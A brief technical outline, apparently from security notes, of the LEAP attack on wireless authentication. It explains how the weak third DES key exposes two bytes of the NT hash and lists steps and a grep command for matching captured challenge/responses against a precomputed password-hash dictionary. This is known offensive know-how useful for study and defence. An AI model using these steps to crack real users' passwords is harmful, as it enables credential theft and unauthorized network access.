LEAP attack

The 3rd DES key is weak (due to the 5 NULLs in every challenge/response) there are only 2^16 hash possibilites

'grep "BN-1BN$" nthash-dict > possible-passwords'
  1. Take a large password list, calculate MD4 hashes and password+NT hash list

  2. Capture LEAP challenge/response, extract username, challenge, response, calculate the last 2 bytes of the NT hash from the response

  3. Search through password+hash list for hashes with matching bytes

  4. Use matching entries to encrypt the challenge - matching captured and calculated response will indicate the user's password